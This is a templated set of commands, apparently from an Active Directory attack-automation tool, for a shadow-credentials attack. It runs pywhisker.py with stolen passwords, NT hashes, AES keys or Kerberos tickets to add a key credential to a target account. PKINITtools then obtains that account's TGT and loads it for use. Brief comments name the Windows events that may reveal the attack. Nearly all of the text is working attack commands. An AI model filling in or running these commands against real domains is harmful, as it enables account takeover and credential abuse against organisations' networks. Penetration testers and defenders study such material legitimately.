# Add a shadow credential on {{target.name}}
# Executing the attack will generate a 5136 (A directory object was modified) event
# at the domain controller if an appropriate SACL is in place on the target object.
# If PKINIT is not common in the environment, a 4768 (Kerberos authentication ticket
# (TGT) was requested) ticket can also expose the attacker.
{% if parent.krb_auth %}
pywhisker.py -d {{fqdn}} -u '{{parent.obj.name}}' -k --no-pass --dc-ip {{dc_ip}} --use-ldaps -t '{{target.name}}' -f '{{target.name}}' --action add -P PFXPASSWORD
{%- elif parent.secret_type == T_SECRET_NTHASH %}
pywhisker.py -d {{fqdn}} -u '{{parent.obj.name}}' -H '{{parent.secret|red}}' --dc-ip {{dc_ip}} --use-ldaps -t '{{target.name}}' -f '{{target.name}}' --action add -P PFXPASSWORD
{%- elif parent.secret_type == T_SECRET_AESKEY %}
pywhisker.py -d {{fqdn}} -u '{{parent.obj.name}}' -k --no-pass --aes-key '{{parent.secret|red}}' --dc-ip {{dc_ip}} --use-ldaps -t '{{target.name}}' -f '{{target.name}}' --action add -P PFXPASSWORD
{%- elif parent.secret_type == T_SECRET_PASSWORD %}
pywhisker.py -d {{fqdn}} -u '{{parent.obj.name}}' -p '{{parent.secret|red}}' --dc-ip {{dc_ip}} --use-ldaps -t '{{target.name}}' -f '{{target.name}}' --action add -P PFXPASSWORD
{% endif %}

# PFX to TGT on {{target.name}}
PKINITtools/gettgtpkinit.py -dc-ip {{dc_ip}} -cert-pfx '{{target.name}}.pfx' -pfx-pass PFXPASSWORD '{{fqdn}}/{{target.name}}' '{{target.name}}.ccache'
export KRB5CCNAME='{{target.name}}.ccache'
